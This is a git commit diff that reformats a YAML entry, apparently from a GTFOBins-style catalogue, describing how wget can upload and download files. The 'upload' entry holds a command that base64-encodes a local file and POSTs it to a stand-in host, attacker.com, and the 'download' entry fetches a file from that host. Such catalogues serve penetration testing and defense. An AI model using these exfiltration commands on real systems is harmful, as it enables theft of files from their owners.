Reorder functions in binaries

This commit is contained in:
Emilio Pinna
2018-07-04 19:26:52 +01:00
parent 80b20b6991
commit d6895f367d
81 changed files with 1171 additions and 1123 deletions

View File

@@ -1,15 +1,16 @@
---
functions:
upload:
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
export LFILE=file_to_send
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
export LFILE=file_to_send
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
wget $URL -O $LFILE
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
wget $URL -O $LFILE
---